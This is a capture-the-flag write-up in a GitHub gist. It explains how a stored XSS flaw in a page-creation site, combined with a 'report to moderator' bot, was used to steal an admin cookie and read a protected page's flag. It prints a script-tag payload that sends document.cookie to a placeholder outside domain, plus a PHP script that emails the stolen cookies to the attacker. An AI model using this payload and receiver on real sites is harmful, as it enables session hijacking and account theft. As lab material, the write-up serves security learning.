Skip to content

Instantly share code, notes, and snippets.

@CSRessel

CSRessel/gist:2f592ae696cccbcc1ad7

Last active August 29, 2015 14:10
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save CSRessel/2f592ae696cccbcc1ad7 to your computer and use it in GitHub Desktop.
Save CSRessel/2f592ae696cccbcc1ad7 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.md

secure_page_service

Summary

This problem is a simple XSS challenge. Using persistent XSS in a newly created page, we can steal the admin’s cookies should they choose to visit the page. The “Report to Moderator” button says, “Report this page, and a moderator will personally review it in the next few minutes!” so it is a safe assumption that we can have an admin view our injected code.

Recon

The first thing we need is an account on the challenge’s site. The home page allows anyone to register. After an account is made, two actions are available: create a page, and view a page. Attempting to view the page asked for in the problem shows it is password protected. A couple quick queries show it is not vulnerable to SQL injection; another route is necessary.

Examining the page creation by creating a couple random pages, we notice that we can report pages to be reviewed by a moderator (“Spam? Abuse? Report this page, and a moderator will personally review it in the next few minutes!”).

Furthermore, attempting to use HTML tags reveals that the input allows HTML code.

Enter XSS

We can use a persistent XSS attack to steal the cookies of whoever views the page. By injecting a script into the page, we can send the viewer’s cookies elsewhere. By setting up a php script on a free hosting script, we can redirect the sent cookies to our own email. The final step will be to report the page to moderator to cause them to view our injected page.

Once we have the admin’s cookies, we can change our cookies to theirs to view the locked page.

The Setup

First we need the two scripts.

The injected script for the page will be:

<script>location.href = 'http://www.YourDomainName.com/cookiestealer.php?cookie='+document.cookie;</script>

And the php script at the above domain name (cookiestealer.php) will look like:

<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail("YourEmail@YouMailProvider.com", "Stolen Cookies", $cookie);
?>

For free hosting, a number of options are available. We chose to use 000webhost, simply because they have a nice in-browser file manager—no need to mess around with FTP clients.

Cookie Forgery

After setting up a page with the injected script and the php script on another server, we simply report the page to have a mod (in reality a bot) view the page.

From here, we check our email for the admin cookies. Using a plugin like <a href= https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en’>this or this we can quickly change our cookies to the admin's, allowing us to view the locked page, and thus, the flag:

wow_cross_site_scripting_is_such_web

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment